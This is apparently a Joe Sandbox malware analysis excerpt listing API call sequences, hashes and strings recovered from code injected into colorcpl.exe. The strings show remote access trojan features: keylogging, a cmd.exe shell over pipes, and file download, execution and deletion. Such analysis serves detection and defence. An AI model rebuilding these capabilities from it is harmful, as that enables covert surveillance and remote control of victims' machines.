                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66f28d6c866646a8e9bf4c20937463259760c86766aac60879c80bfb23a75ef1
                                                                                                                              • Instruction ID: 233cf81fef1863a71d25dcb3fe277913934aee51a0331b259385ecf81dd8aa74
                                                                                                                              • Opcode Fuzzy Hash: 66f28d6c866646a8e9bf4c20937463259760c86766aac60879c80bfb23a75ef1
                                                                                                                              • Instruction Fuzzy Hash: 5951C3B1E009099BDF10DFA4D844FAEBBB8EF15B14F040159E611A7290FA70BE65CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3963590051-0
                                                                                                                              • Opcode ID: 126f041800a3469b6d674969d92a52763847f83e8cb163c7330601a78815eaab
                                                                                                                              • Instruction ID: a4a2e9481a94fe72f3aac2e283f469c206edbb280625665a6353f78e01bdc3be
                                                                                                                              • Opcode Fuzzy Hash: 126f041800a3469b6d674969d92a52763847f83e8cb163c7330601a78815eaab
                                                                                                                              • Instruction Fuzzy Hash: 7F214FB2900119ABEF04BBA0EC94DEEB77CBF14218B00451DE917A2190FE34BA09C6A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 046735F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 8ae40fc9c9b95f246c1304958e4f23b7234f553c9782e8696362bdc5b5834130
                                                                                                                              • Instruction ID: f8566699b246a9af7779d541973b90b18c8d7ef02d27aafa730aed8622c760d3
                                                                                                                              • Opcode Fuzzy Hash: 8ae40fc9c9b95f246c1304958e4f23b7234f553c9782e8696362bdc5b5834130
                                                                                                                              • Instruction Fuzzy Hash: 5F0162BAA00128BBCB209A95DD49DEE7F7DDF84650F004159BF05E2200FA759E99DBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 04673714
                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0467372D
                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 04673738
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                                                                              • Instruction ID: f1ebd8493069869427885226bfe24ef27fbbc54f26b26b010f3b2bbfdba88920
                                                                                                                              • Opcode Fuzzy Hash: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                                                                              • Instruction Fuzzy Hash: 2A0146B1800129FBDF219FA1EC48DEA7F78EF15750F004158BE0862210F63299A9EBE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04673569
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 04673587
                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 04673592
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                                                                              • Instruction ID: 05190e63dd937675ccadc831120cace18a8d229c83d0203fba7c2cb7ec8f0a69
                                                                                                                              • Opcode Fuzzy Hash: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                                                                              • Instruction Fuzzy Hash: D8F0A976900218BFEF109EA09D45FEA7BBCEB44710F104195BE05E6241E6755E98EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0466C19C,046C6C48), ref: 04673516
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0466C19C,046C6C48), ref: 0467352A
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0466C19C,046C6C48), ref: 04673535
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                                                                              • Instruction ID: fc78f3e5f80dbdedf372035dff9b912552af5f9ef527519fdabb381caff05dba
                                                                                                                              • Opcode Fuzzy Hash: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                                                                              • Instruction Fuzzy Hash: 2BE06571905138BB9F204BA29C0DDEB7F6CDF06BA0B000144BE0D91200E2255E94E6E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04673885
                                                                                                                              • RegSetValueExA.KERNEL32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738A0
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1818849710-0
                                                                                                                              • Opcode ID: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                                                                              • Instruction ID: 032b695466c1490476e8a0b4f92c6d03e895294f0072f55d484f908086437a04
                                                                                                                              • Opcode Fuzzy Hash: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                                                                              • Instruction Fuzzy Hash: 89E03072500218FBEF115E909C05FEA7B6CDF04750F004154FF05A6240E2399E98EBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,046D4EF8,04664C49,00000000,?,?,?,046D4EF8,0466530B), ref: 04664BA5
                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0466548B), ref: 04664BC3
                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 04664BDA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EventObjectSingleWaitrecv
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 311754179-0
                                                                                                                              • Opcode ID: bf1f7afac80dd98004f718d495bf5e9bc3cee6f345dfa24821bbec6eea049b26
                                                                                                                              • Instruction ID: 2752b615850688cc65150a5a0053b7c10cdd0da989f460eb1ef3321a9a6e6a0d
• Opcode Fuzzy Hash: bf1f7afac80dd98004f718d495bf5e9bc3cee6f345dfa24821bbec6eea049b26
• Instruction Fuzzy Hash: F4F08276118212BFDB059B10FC48F49FB66FB85720F10861AF511522A0EB72BC64DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0467B7CA
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
• Instruction ID: 24f01c2f939f861b70af8df85cc8e4c357a4de8ad9de5488374fccbce0bd84ee
• Opcode Fuzzy Hash: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
• Instruction Fuzzy Hash: C6D017B58023189FC720DFA8E804A8DBBFCFB08210F00416AEC49E3700E774AC008B84
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID:
• API String ID: 180926312-0
• Opcode ID: c5917da4d85c25f65e26fdbe86fd60581c062fa1cdfd906e5a11d1ad0ef08a3d
• Instruction ID: fb9a64e1978622389ac3b4dd57950c39fed2c83a1d762b6cc682697536c4b0ed
• Opcode Fuzzy Hash: c5917da4d85c25f65e26fdbe86fd60581c062fa1cdfd906e5a11d1ad0ef08a3d
• Instruction Fuzzy Hash: 3B519F716082019BE724FB71D8A0AFFB3E5AF91618F50492DE547871D0FF30B90AC68A
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,046ABB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 046AB6ED
• GetLastError.KERNEL32(?,046ABB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0469CE84,?,046D4EF8,?,83EC8B55,?,458B2CEC), ref: 046AB716
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: d1480167b25fcf4b811903955e45f4179ce24e78577782b2dfab9656a102c729
• Instruction ID: 4353118c3f994cfce513196a3114128f1736cb20acfc77f33cff0deabc228f84
• Opcode Fuzzy Hash: d1480167b25fcf4b811903955e45f4179ce24e78577782b2dfab9656a102c729
• Instruction Fuzzy Hash: A421B135A006199FCB14CF69D880BE9B3F8FB48702F1448AAEA46D7251E770BD95CF60
Uniqueness
Uniqueness Score: -1.00%

APIs
• socket.WS2_32(?,00000001,00000006), ref: 04664852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,04665379,?,?,00000000,?,0466530B,?,Keylogger initialization failure: error ), ref: 0466488E
  • Part of subcall function 0466489E: WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: bc88a38efdede68a2dea8e802bfda07907c7a24057e2a845402449cd5968b10f
• Instruction ID: 92123e0a427e1add6f51bf90136b3a66ab1f1cce5e723bdaa35901cce91bca27
• Opcode Fuzzy Hash: bc88a38efdede68a2dea8e802bfda07907c7a24057e2a845402449cd5968b10f
• Instruction Fuzzy Hash: 8E01B170808B808ED7348F28A4443867FE0EB15304F04595EF0CA83B80E7B5A441CB14
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32 ref: 0467BAB8
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0467BACB
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: f375770c2d8bc422c8b4eefe2f77404aca74e48e579bee695206cdf602399c03
• Instruction ID: 268232c0418743fc5bbd35f7eb9d69cd4e5a1f7ed3a4212bfef2295fd017f0bd
• Opcode Fuzzy Hash: f375770c2d8bc422c8b4eefe2f77404aca74e48e579bee695206cdf602399c03
• Instruction Fuzzy Hash: 47E09271A0032827EB20A6A4DC8DFE9776CEB04704F000099B619D2181FDA46D448BE4
Uniqueness
Uniqueness Score: -1.00%

APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,046D2ADC,046D50E4,00000000,04675188,00000000,00000001), ref: 04674F0B
• WSASetLastError.WS2_32(00000000), ref: 04674F10
  • Part of subcall function 04674D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674DD5
  • Part of subcall function 04674D86: LoadLibraryA.KERNEL32(?), ref: 04674E17
  • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E37
  • Part of subcall function 04674D86: FreeLibrary.KERNEL32(00000000), ref: 04674E3E
  • Part of subcall function 04674D86: LoadLibraryA.KERNEL32(?), ref: 04674E76
  • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E88
  • Part of subcall function 04674D86: FreeLibrary.KERNEL32(00000000), ref: 04674E8F
  • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,?), ref: 04674E9E
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-0
• Opcode ID: 7608002e10e12cccda6423f2a8547e05c26864cf6e2ea6eef58e3ce23efb87f3
• Instruction ID: 5ded66d8cdb263023c26accde1fe116b1765c7a38d61c542cf90f5776efab29a
• Opcode Fuzzy Hash: 7608002e10e12cccda6423f2a8547e05c26864cf6e2ea6eef58e3ce23efb87f3
• Instruction Fuzzy Hash: 0CD05B326015216F9320A65D9C04EBBD69CDFD77747051027F900D3100FA94AC4187F0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0466EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,046C60BC,00000003,00000000), ref: 0466D078
• GetLastError.KERNEL32 ref: 0466D083
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID:
• API String ID: 1925916568-0
• Opcode ID: 1c1563ffa5383d48a75418b9266a30cd73a33eb2fe7def2c3ddce8972f455712
• Instruction ID: 466b1fc538f9ffd6e8ae3dd15adea117c54724b2b14c0a557207615c02ca7118
• Opcode Fuzzy Hash: 1c1563ffa5383d48a75418b9266a30cd73a33eb2fe7def2c3ddce8972f455712
• Instruction Fuzzy Hash: 86D012F0E15200ABFB181B70945975839A4D744702F40141DF207D59C0FA788CD48551
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
• Opcode ID: f20fe28be105365bd72796de1a0bf666a86eb82769a796abaf9954a45737d45e
• Instruction ID: a0a53d2bb4af06a93d1f6059155590b9da558a1ff6cd3854083e08710af51134
• Opcode Fuzzy Hash: f20fe28be105365bd72796de1a0bf666a86eb82769a796abaf9954a45737d45e
• Instruction Fuzzy Hash: 2B119D719002099FEB05EF64E8518EFBBF5EF58218B10001EE80796290FF74BD19CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 4122f9f1ac1aaced518aeb6e0aa7ba6cb8aaa715819e4df93ff3bf146f385614
• Instruction ID: b1c937b673abc72507dead5a52ff60f2576c980197ea7dab7f2605919294721a
• Opcode Fuzzy Hash: 4122f9f1ac1aaced518aeb6e0aa7ba6cb8aaa715819e4df93ff3bf146f385614
• Instruction Fuzzy Hash: 05111875A0410AAFCB05DF58E9449DA7BF8EF48314F1540A9F809AB311E671EE21CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 3153016868e91cfd35e28152446a85961119893ca57cc87871ad8776825d878a
• Instruction ID: 322a81cde454e9e37334ba9b95bb0fa1ede206ac4e259af1bd06cfbefbea5e10
• Opcode Fuzzy Hash: 3153016868e91cfd35e28152446a85961119893ca57cc87871ad8776825d878a
• Instruction Fuzzy Hash: 2CF0BE33510009FBDF005E95DC00CDE3B6DEF89338F100155FA24921A0EA72EE60ABE1
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,00000000,?,046B5C84,?,?,00000000,?,046B5C84,00000000,0000000C), ref: 046B58C6
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: cebc5cb74102d7d1ede294c2666d74007b37e50417620f32066d96f080b5a4da
• Instruction ID: a4371312d4e601a6d1dc63852480c2caa4fb3b922823a318e8ea6e1b80518dee
• Opcode Fuzzy Hash: cebc5cb74102d7d1ede294c2666d74007b37e50417620f32066d96f080b5a4da
• Instruction Fuzzy Hash: 76D06C3200020DBBDF028F84DC06EDA3BAAFB48714F014000BA1856060C736E861AB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Startup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 724789610-0
                                                                                                                              • Opcode ID: e43bb6048945b2887eb3f3045032fd9cf51994bfea67167ecd427f60e19e7bfe
                                                                                                                              • Instruction ID: 13602c292bab1dca4726e849e9f760aef0a119ab2122f1ca306ed07302dc3c3e
                                                                                                                              • Opcode Fuzzy Hash: e43bb6048945b2887eb3f3045032fd9cf51994bfea67167ecd427f60e19e7bfe
                                                                                                                              • Instruction Fuzzy Hash: DDD0127295960C4EE721AAB4AC0F8E5775CC312615F0407AB6DB5835C2F6481B1CC2F7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 04667CB9
                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 04667D87
                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 04667DA9
                                                                                                                                • Part of subcall function 0467C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C2EC
                                                                                                                                • Part of subcall function 0467C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C31C
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C371
                                                                                                                                • Part of subcall function 0467C291: FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D2
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D9
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                                • Part of subcall function 04664AA1: WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                                • Part of subcall function 04664AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04668197
                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 04668278
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 046684C4
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 04668652
                                                                                                                                • Part of subcall function 0466880C: __EH_prolog.LIBCMT ref: 04668811
                                                                                                                                • Part of subcall function 0466880C: FindFirstFileW.KERNEL32(00000000,?,Function_00066608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688CA
                                                                                                                                • Part of subcall function 0466880C: __CxxThrowException@8.LIBVCRUNTIME ref: 046688F2
                                                                                                                                • Part of subcall function 0466880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688FF
                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 046686F8
                                                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 0466873A
                                                                                                                                • Part of subcall function 0467C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0467CAD7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                              • API String ID: 1067849700-1507758755
                                                                                                                              • Opcode ID: 230f11b8882a842d746ba8a39bbcdf28e2c4a2b77d9dd81bb50d7507f094e4c5
                                                                                                                              • Instruction ID: 1b4ab880a8d09c024ba75e83498d564e6e6072a0495b670c9ed77572244fcda7
                                                                                                                              • Opcode Fuzzy Hash: 230f11b8882a842d746ba8a39bbcdf28e2c4a2b77d9dd81bb50d7507f094e4c5
                                                                                                                              • Instruction Fuzzy Hash: C0427171A04304ABE718FB75C8699FE77A9AF92608F80091CE54357191FE34BA09C7DB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 046656E6
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 04665723
                                                                                                                              • CreatePipe.KERNEL32(046D6CCC,046D6CB4,046D6BD8,00000000,046C60BC,00000000), ref: 046657B6
                                                                                                                              • CreatePipe.KERNEL32(046D6CB8,046D6CD4,046D6BD8,00000000), ref: 046657CC
                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,046D6BE8,046D6CBC), ref: 0466583F
                                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 04665897
                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 046658BC
                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 046658E9
                                                                                                                                • Part of subcall function 04694770: __onexit.LIBCMT ref: 04694776
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,046D4F90,Function_000660C0,00000062,Function_000660A4), ref: 046659E4
                                                                                                                              • Sleep.KERNEL32(00000064,00000062,Function_000660A4), ref: 046659FE
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 04665A17
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A23
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A2B
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A3D
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                              • String ID: SystemDrive$cmd.exe
                                                                                                                              • API String ID: 2994406822-3633465311
                                                                                                                              • Opcode ID: 08aa0d3519c40bf520cda46f37196d286b8272779d05665b6af6c38879ff49ce
